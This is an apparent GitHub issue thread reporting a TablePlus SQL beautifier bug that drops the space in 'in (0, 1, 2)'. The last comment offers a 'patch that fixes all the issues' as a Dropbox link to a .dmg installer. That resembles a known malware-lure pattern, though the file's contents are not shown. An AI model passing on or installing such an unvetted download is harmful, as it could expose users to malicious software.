### ISSUE TITLE
beautify bug with `in (1, 2, 3)`

### ISSUE THREAD

**Issue by georgexsh** [TablePlus/TablePlus#1215]
1. Which driver are you using and version of it (Ex: PostgreSQL 10.0):
mysql 5

2. Which TablePlus build number are you using (the number on the welcome screen, Ex: build 81):

228

3. The steps to reproduce this issue:

```
i.status in (0, 1, 2)
```
became
```
i.status in(0, 1, 2)
``` 
space before the left parentheses got removed mistakenly.

**Comment by georgexsh** [comment]
am I the most annoying user?

**Comment by huyphams** [comment]
I'm no problem with it but there are 32 users who subscribe to this repo, so if you have any question related to the UI/UX please kindly email me at nick@tableplus.com.
If you found a bug, please create a new issue but too many issues can slow me down because I'm having 383 issues now.

**Comment by huyphams** [comment]
Hi if you have a chance, you could try this patch, it fixes all the issues:
https://www.dropbox.com/scl/fi/rnzl329j9llknuoj0c0h1/TablePlus.dmg?rlkey=fykl1eshbl1ylnn48s5ic7rau&st=00mt04zi&dl=0
